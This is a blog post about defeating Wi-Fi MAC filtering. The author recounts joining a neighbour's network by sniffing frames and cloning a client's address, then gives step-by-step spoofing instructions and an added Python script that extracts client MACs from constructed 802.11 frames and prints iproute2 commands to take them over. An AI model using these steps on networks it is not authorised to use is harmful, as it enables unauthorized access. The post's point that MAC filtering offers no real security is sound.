You have heard me talk about how easy it is to break wireless encryption, and yes, it is easy. Every time I write an article that mentions this, someone invariably asks me if I can tell them how to break some type of wireless encryption. If they're my friends, and they have a legitimate reason, I'll do it for them and not tell them how. If it's a random stranger my answer is always “I can't do that, but I can point you to a website that has some utilities that might be able to help you out.” Strangely enough, a link to that site is on the side of my webpage... (hint, it rhymes with binsecure and ends with .org...)
Usually, unless I am in dire need of the Internet and have no connection close by (like a Starbucks or my house), I don't do any encryption cracking. In fact, I think I have done so only once outside my home lab. However, a few weeks ago I ran across a new wireless network in my apartment complex. This new wireless network was named “Haha.”
I was intrigued; usually a person puts down something like “Michelle's network” or “home wireless” or some equally uninformative name. The younger among us may put down something funny (I myself am partial to kawaii or kitanai). But Haha? I had to check it out. So I tried to connect to it, and failed. So I tried again, and failed... There was no encryption; it should have been a breeze...
In a flash it hit me: this person was using MAC filtering as his security. Suddenly it all made sense. Haha was a taunt to people who thought they could connect to an unsecured connection. Personally, his “security” just made me laugh as I fired up Wireshark, captured a few packets and connected to his network.
I didn't do anything malicious (and if I ever hear of friends doing something malicious to someone's network I kick them... don't make me come after you and kick you...). However, I was sorely tempted.
What does that story have to do with not telling people how to crack wireless encryption? Well, I'm going to break that rule slightly and tell you how to crack MAC filtering (only slightly, because MAC filtering is just a joke).
MAC filtering is the easiest wireless “security” to break, and it should never be used as anything more than a convenience on top of real encryption (WPA2 at the time of writing). MAC filtering allows or denies access to the WAP based on your wireless card's MAC address. A MAC address is a 48-bit identifier written as 12 hex digits in six groups (octets); 00-0f-00-3b-a2-7e is an example. The first three octets (00-0f-00) are the Organizationally Unique Identifier (OUI), which identifies the manufacturer of the NIC; the last three octets (3b-a2-7e) are assigned by that manufacturer to the individual card. The address is burned into the card and meant to be unique, but nearly every driver lets you override it in software, which is the whole problem: the filter trusts an identifier that anyone can change and that is never authenticated.
This seems like the perfect solution: only the people you want can connect to your network, and there is no long password to remember. The problem is that your MAC address is sent in the clear in the 802.11 frame header of every frame your card transmits. The frame header is not part of what WEP or WPA encrypts, so this is true even on an encrypted network; anyone in radio range can read which stations are talking to which access point. On an open network the payload is readable as well, so MAC filtering protects neither access nor confidentiality.
So all you need to do is capture one data frame sent by a legitimate client to the WAP, read the client's source (transmitter) address out of the header, and set your own wireless NIC to that address. Two details matter here. First, make sure you copy a client's address and not the access point's BSSID, which also appears in every frame. Second, if the legitimate client is still active you will both be fighting over the same address and connectivity will be flaky for both of you, so the quiet moments are the ones to use. To capture frames your adapter must be in monitor mode, which is straightforward on Linux with Wireshark or tcpdump; on Windows the stock drivers generally do not expose monitor mode, so capturing traffic for a network you are not joined to there needs an adapter and driver that specifically support it. Once you have the address, change yours and connect to the WAP. On Linux the iproute2 command `ip link set dev wlan0 address <mac>` (with the interface down) does it; on Windows, macshift, etherchange or Technitium MAC Address Changer will do the same, just to name a few (links).
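The whole attack lives in the 802.11 header, so here is what “find the MAC address in the header” actually means, as an added example rather than anything from the original post. The script parses the 24-byte 802.11 MAC header, uses the To-DS/From-DS bits to decide which of the three addresses is the client (not the access point's BSSID, and not a broadcast address), notes the Protected flag to show that an encrypted body does nothing to hide the header, splits the OUI from the card-specific part, and emits the iproute2 commands that would take over the address. The frames, the BSSID 00:1a:2b:3c:4d:5e and the interface name wlan0 are all constructed for the example; in practice the frames come from a monitor-mode capture.

```python
"""Recover MAC-filter whitelist candidates from raw 802.11 frames.

Added example, not the original post's code. All frames, the BSSID and
the interface name below are constructed so the script runs offline; in
practice the frames come from a monitor-mode capture (tcpdump/Wireshark).
"""
import struct


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(x, 16) for x in text.replace("-", ":").split(":"))


def parse_80211_header(frame: bytes) -> dict:
    """Decode the 802.11 MAC header. It is never encrypted, even on WEP/WPA."""
    if len(frame) < 24:
        raise ValueError("frame shorter than a 3-address MAC header")
    fc, = struct.unpack_from("<H", frame, 0)      # frame control, little-endian
    flags = fc >> 8
    return {
        "type": (fc >> 2) & 0x3,                  # 0 mgmt, 1 control, 2 data
        "subtype": (fc >> 4) & 0xF,
        "to_ds": bool(flags & 0x01),
        "from_ds": bool(flags & 0x02),
        "protected": bool(flags & 0x40),          # body encrypted, header is not
        "addr1": frame[4:10],
        "addr2": frame[10:16],
        "addr3": frame[16:22],
    }


def station_for_bssid(hdr: dict, bssid: bytes):
    """Client MAC in a data frame exchanged with `bssid`, or None."""
    if hdr["type"] != 2:                           # beacons etc. name no client
        return None
    if hdr["to_ds"] and not hdr["from_ds"]:
        # station -> AP: addr1 = BSSID, addr2 = transmitting station
        if hdr["addr1"] == bssid:
            return hdr["addr2"]
    elif hdr["from_ds"] and not hdr["to_ds"]:
        # AP -> station: addr1 = receiving station, addr2 = BSSID
        # skip group addresses (low bit of first octet set): not a client
        if hdr["addr2"] == bssid and not (hdr["addr1"][0] & 0x01):
            return hdr["addr1"]
    return None


def whitelisted_clients(frames, bssid: str) -> list:
    """Distinct client MACs seen exchanging data with the AP, in capture order."""
    target, seen = mac_bytes(bssid), []
    for f in frames:
        st = station_for_bssid(parse_80211_header(f), target)
        if st is not None and st not in seen:
            seen.append(st)
    return [mac_str(s) for s in seen]


def describe_mac(mac: str) -> dict:
    """Split an address into OUI and NIC part and read the two flag bits."""
    raw = mac_bytes(mac)
    return {
        "oui": mac_str(raw[:3]),
        "nic": mac_str(raw[3:]),
        "locally_administered": bool(raw[0] & 0x02),   # software-set address
        "multicast": bool(raw[0] & 0x01),
    }


def spoof_commands(mac: str, iface: str = "wlan0") -> list:
    """iproute2 commands that would take over `mac` on Linux (not executed here)."""
    return [
        f"ip link set dev {iface} down",
        f"ip link set dev {iface} address {mac}",
        f"ip link set dev {iface} up",
    ]


def build_frame(fc_lo, fc_hi, a1, a2, a3, body=b"\x00" * 8) -> bytes:
    """Minimal constructed frame: FC, duration, addr1..3, sequence control, body."""
    return (bytes([fc_lo, fc_hi]) + b"\x00\x00" + mac_bytes(a1) + mac_bytes(a2)
            + mac_bytes(a3) + b"\x00\x00" + body)


AP = "00:1a:2b:3c:4d:5e"   # constructed BSSID of the "Haha" access point
SAMPLE_FRAMES = [          # constructed capture
    build_frame(0x80, 0x00, "ff:ff:ff:ff:ff:ff", AP, AP),                      # beacon
    build_frame(0x08, 0x41, AP, "00:0f:00:3b:a2:7e", AP),                      # client->AP, Protected
    build_frame(0x08, 0x02, "00:0f:00:aa:bb:cc", AP, "00:50:56:11:22:33"),     # AP->client
    build_frame(0x08, 0x02, "ff:ff:ff:ff:ff:ff", AP, AP),                      # AP->broadcast
    build_frame(0x08, 0x01, "66:77:88:99:aa:bb", "00:0f:00:de:ad:00", "66:77:88:99:aa:bb"),  # other BSS
]

if __name__ == "__main__":
    for mac in whitelisted_clients(SAMPLE_FRAMES, AP):
        print(mac, describe_mac(mac))
        print("\n".join(spoof_commands(mac)))
```

The second sample frame has the Protected bit set and still yields 00:0f:00:3b:a2:7e, which is the point of the post in one line: encrypting the body does not hide the addresses in the header. The locally-administered bit is worth checking on the client you copy; a cloned vendor OUI looks like the real card, whereas an address with that bit set tells an attentive admin it was set in software.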
- What can MAC filtering do for you?